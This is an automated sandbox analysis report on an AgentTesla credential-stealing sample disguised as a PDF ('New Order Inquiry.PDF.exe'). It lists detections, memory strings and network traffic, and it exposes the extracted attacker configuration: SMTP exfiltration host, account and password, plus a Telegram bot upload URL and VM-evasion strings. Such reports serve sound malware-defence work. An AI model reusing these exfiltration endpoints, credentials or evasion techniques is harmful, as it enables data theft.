Loading ...

Play interactive tourEdit tour

Analysis Report New Order Inquiry.PDF.exe

Overview

General Information

Sample Name:New Order Inquiry.PDF.exe
Analysis ID:326328
MD5:a0ce94d59dc8204e8cdbce7c4d635d32
SHA1:8599d6d2c48067e3c29cd751dba94ed06313fd75
SHA256:415e3b94a339a45d036814c1bfbae3a24befccaf6bbba44a5265613f3aec3ef7
Tags:AgentTeslaexe

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: Suspicious Double Extension
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
Yara detected AntiVM_3
.NET source code contains very large strings
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Machine Learning detection for sample
Moves itself to temp directory
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Uses an obfuscated file name to hide its real file extension (double extension)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • New Order Inquiry.PDF.exe (PID: 6604 cmdline: 'C:\Users\user\Desktop\New Order Inquiry.PDF.exe' MD5: A0CE94D59DC8204E8CDBCE7C4D635D32)
    • New Order Inquiry.PDF.exe (PID: 6808 cmdline: C:\Users\user\Desktop\New Order Inquiry.PDF.exe MD5: A0CE94D59DC8204E8CDBCE7C4D635D32)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "thMm2wh2OXe", "URL: ": "https://8vhVWmhsLg6p.com", "To: ": "billyfunds@divasvalves.com", "ByHost: ": "smtp.divasvalves.com:587", "Password: ": "dz2o9HgMmb", "From: ": "billyfunds@divasvalves.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.489798075.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000002.00000002.493883297.00000000032E1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000002.00000002.493883297.00000000032E1000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.230902914.0000000002461000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          00000000.00000002.231364054.0000000003469000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.New Order Inquiry.PDF.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

              Sigma Overview

              System Summary:

              barindex
              Sigma detected: Suspicious Double ExtensionShow sources
              Source: Process startedAuthor: Florian Roth (rule), @blu3_team (idea): Data: Command: C:\Users\user\Desktop\New Order Inquiry.PDF.exe, CommandLine: C:\Users\user\Desktop\New Order Inquiry.PDF.exe, CommandLine|base64offset|contains: :^, Image: C:\Users\user\Desktop\New Order Inquiry.PDF.exe, NewProcessName: C:\Users\user\Desktop\New Order Inquiry.PDF.exe, OriginalFileName: C:\Users\user\Desktop\New Order Inquiry.PDF.exe, ParentCommandLine: 'C:\Users\user\Desktop\New Order Inquiry.PDF.exe' , ParentImage: C:\Users\user\Desktop\New Order Inquiry.PDF.exe, ParentProcessId: 6604, ProcessCommandLine: C:\Users\user\Desktop\New Order Inquiry.PDF.exe, ProcessId: 6808

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Found malware configurationShow sources
              Source: New Order Inquiry.PDF.exe.6808.2.memstrMalware Configuration Extractor: Agenttesla {"Username: ": "thMm2wh2OXe", "URL: ": "https://8vhVWmhsLg6p.com", "To: ": "billyfunds@divasvalves.com", "ByHost: ": "smtp.divasvalves.com:587", "Password: ": "dz2o9HgMmb", "From: ": "billyfunds@divasvalves.com"}
              Machine Learning detection for sampleShow sources
              Source: New Order Inquiry.PDF.exeJoe Sandbox ML: detected
              Source: 2.2.New Order Inquiry.PDF.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8

              Networking:

              barindex
              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
              Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49743 -> 208.91.198.143:587
              Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49744 -> 208.91.198.143:587
              Source: global trafficTCP traffic: 192.168.2.3:49743 -> 208.91.198.143:587
              Source: Joe Sandbox ViewIP Address: 208.91.198.143 208.91.198.143
              Source: global trafficTCP traffic: 192.168.2.3:49743 -> 208.91.198.143:587
              Source: unknownDNS traffic detected: queries for: smtp.divasvalves.com
              Source: New Order Inquiry.PDF.exe, 00000002.00000002.493883297.00000000032E1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
              Source: New Order Inquiry.PDF.exe, 00000002.00000002.493883297.00000000032E1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
              Source: New Order Inquiry.PDF.exe, 00000002.00000002.496450719.00000000035FB000.00000004.00000001.sdmpString found in binary or memory: http://smtp.divasvalves.com
              Source: New Order Inquiry.PDF.exe, 00000002.00000002.496450719.00000000035FB000.00000004.00000001.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
              Source: New Order Inquiry.PDF.exe, 00000002.00000002.493883297.00000000032E1000.00000004.00000001.sdmpString found in binary or memory: http://zwdNmL.com
              Source: New Order Inquiry.PDF.exe, 00000002.00000002.493883297.00000000032E1000.00000004.00000001.sdmp, New Order Inquiry.PDF.exe, 00000002.00000003.445087309.0000000001554000.00000004.00000001.sdmpString found in binary or memory: https://8vhVWmhsLg6p.com
              Source: New Order Inquiry.PDF.exe, 00000002.00000002.493883297.00000000032E1000.00000004.00000001.sdmpString found in binary or memory: https://8vhVWmhsLg6p.comH#7
              Source: New Order Inquiry.PDF.exe, 00000002.00000002.493883297.00000000032E1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.orgGETMozilla/5.0
              Source: New Order Inquiry.PDF.exe, 00000000.00000002.231364054.0000000003469000.00000004.00000001.sdmp, New Order Inquiry.PDF.exe, 00000002.00000002.489798075.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot%telegramapi%/
              Source: New Order Inquiry.PDF.exe, 00000002.00000002.493883297.00000000032E1000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------x
              Source: New Order Inquiry.PDF.exe, 00000000.00000002.231364054.0000000003469000.00000004.00000001.sdmp, New Order Inquiry.PDF.exe, 00000002.00000002.489798075.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
              Source: New Order Inquiry.PDF.exe, 00000002.00000002.493883297.00000000032E1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

              Key, Mouse, Clipboard, Microphone and Screen Capturing:

              barindex
              Installs a global keyboard hookShow sources
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\New Order Inquiry.PDF.exe
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeWindow created: window name: CLIPBRDWNDCLASS

              System Summary:

              barindex
              .NET source code contains very large stringsShow sources
              Source: New Order Inquiry.PDF.exe, MMqB??p??W/??BuWDp??pvBH.csLong String: Length: 81136
              Source: 0.0.New Order Inquiry.PDF.exe.70000.0.unpack, MMqB??p??W/??BuWDp??pvBH.csLong String: Length: 81136
              Source: 0.2.New Order Inquiry.PDF.exe.70000.0.unpack, MMqB??p??W/??BuWDp??pvBH.csLong String: Length: 81136
              Source: 2.2.New Order Inquiry.PDF.exe.ed0000.1.unpack, MMqB??p??W/??BuWDp??pvBH.csLong String: Length: 81136
              Source: 2.0.New Order Inquiry.PDF.exe.ed0000.0.unpack, MMqB??p??W/??BuWDp??pvBH.csLong String: Length: 81136
              Initial sample is a PE file and has a suspicious nameShow sources
              Source: initial sampleStatic PE information: Filename: New Order Inquiry.PDF.exe
              Source: initial sampleStatic PE information: Filename: New Order Inquiry.PDF.exe
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeCode function: 0_2_009CA908
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeCode function: 0_2_009C9CF0
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeCode function: 0_2_009C7F7E
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeCode function: 0_2_009C6B64
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeCode function: 2_2_016E4860
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeCode function: 2_2_016E3D9C
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeCode function: 2_2_016E4770
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeCode function: 2_2_016E4852
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeCode function: 2_2_016E4810
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeCode function: 2_2_016E5550
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeCode function: 2_2_017059F8
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeCode function: 2_2_017008F6
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeCode function: 2_2_01704B30
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeCode function: 2_2_01708D98
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeCode function: 2_2_0170B420
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeCode function: 2_2_01700FB4
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeCode function: 2_2_0170D928
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeCode function: 2_2_0170D550
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeCode function: 2_2_01709F88
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeCode function: 2_2_01736510
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeCode function: 2_2_01735DD8
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeCode function: 2_2_017323BB
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeCode function: 2_2_017357A0
              Source: New Order Inquiry.PDF.exe, 00000000.00000002.235583981.0000000005971000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameNT1.dll, vs New Order Inquiry.PDF.exe
              Source: New Order Inquiry.PDF.exe, 00000000.00000002.230902914.0000000002461000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamexQPaXEtXLxQxMXsDyBVeeCdxdcLaKUF.exe4 vs New Order Inquiry.PDF.exe
              Source: New Order Inquiry.PDF.exe, 00000000.00000000.221683014.0000000000118000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameContinuationTaskFromTask.exe@ vs New Order Inquiry.PDF.exe
              Source: New Order Inquiry.PDF.exe, 00000000.00000002.231364054.0000000003469000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameGlaxoSmithKline.dll@ vs New Order Inquiry.PDF.exe
              Source: New Order Inquiry.PDF.exe, 00000002.00000002.493347759.00000000018D0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewshom.ocx.mui vs New Order Inquiry.PDF.exe
              Source: New Order Inquiry.PDF.exe, 00000002.00000002.489798075.0000000000402000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamexQPaXEtXLxQxMXsDyBVeeCdxdcLaKUF.exe4 vs New Order Inquiry.PDF.exe
              Source: New Order Inquiry.PDF.exe, 00000002.00000002.499432901.0000000006720000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs New Order Inquiry.PDF.exe
              Source: New Order Inquiry.PDF.exe, 00000002.00000002.491234427.0000000001338000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs New Order Inquiry.PDF.exe
              Source: New Order Inquiry.PDF.exe, 00000002.00000002.493326344.00000000018C0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewshom.ocx vs New Order Inquiry.PDF.exe
              Source: New Order Inquiry.PDF.exe, 00000002.00000002.491149432.0000000000F78000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameContinuationTaskFromTask.exe@ vs New Order Inquiry.PDF.exe
              Source: New Order Inquiry.PDF.exeBinary or memory string: OriginalFilenameContinuationTaskFromTask.exe@ vs New Order Inquiry.PDF.exe
              Source: New Order Inquiry.PDF.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/2@2/2
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\New Order Inquiry.PDF.exe.logJump to behavior
              Source: New Order Inquiry.PDF.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeFile read: C:\Users\user\Desktop\New Order Inquiry.PDF.exe:Zone.IdentifierJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\New Order Inquiry.PDF.exe 'C:\Users\user\Desktop\New Order Inquiry.PDF.exe'
              Source: unknownProcess created: C:\Users\user\Desktop\New Order Inquiry.PDF.exe C:\Users\user\Desktop\New Order Inquiry.PDF.exe
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess created: C:\Users\user\Desktop\New Order Inquiry.PDF.exe C:\Users\user\Desktop\New Order Inquiry.PDF.exe
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: New Order Inquiry.PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: New Order Inquiry.PDF.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeCode function: 2_2_016ED331 push esp; iretd
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeCode function: 2_2_0173B5FF push edi; retn 0000h
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeCode function: 2_2_0173D458 pushad ; retf
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeCode function: 2_2_0173D44C pushad ; retf
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeCode function: 2_2_017356F0 push es; ret
              Source: initial sampleStatic PE information: section name: .text entropy: 7.00471391573

              Hooking and other Techniques for Hiding and Protection:

              barindex
              Moves itself to temp directoryShow sources
              Source: c:\users\user\desktop\new order inquiry.pdf.exeFile moved: C:\Users\user\AppData\Local\Temp\tmpG468.tmpJump to behavior
              Uses an obfuscated file name to hide its real file extension (double extension)Show sources
              Source: Possible double extension: pdf.exeStatic PE information: New Order Inquiry.PDF.exe
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion:

              barindex
              Yara detected AntiVM_3Show sources
              Source: Yara matchFile source: 00000000.00000002.230902914.0000000002461000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: New Order Inquiry.PDF.exe PID: 6604, type: MEMORY
              Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
              Source: New Order Inquiry.PDF.exe, 00000000.00000002.230902914.0000000002461000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
              Source: New Order Inquiry.PDF.exe, 00000000.00000002.230902914.0000000002461000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeWindow / User API: threadDelayed 8287
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeWindow / User API: threadDelayed 1570
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exe TID: 6608Thread sleep time: -51538s >= -30000s
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exe TID: 6632Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exe TID: 3664Thread sleep time: -14757395258967632s >= -30000s
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exe TID: 5388Thread sleep count: 8287 > 30
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exe TID: 5388Thread sleep count: 1570 > 30
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: New Order Inquiry.PDF.exe, 00000000.00000002.230902914.0000000002461000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: New Order Inquiry.PDF.exe, 00000000.00000002.230902914.0000000002461000.00000004.00000001.sdmpBinary or memory string: vmware
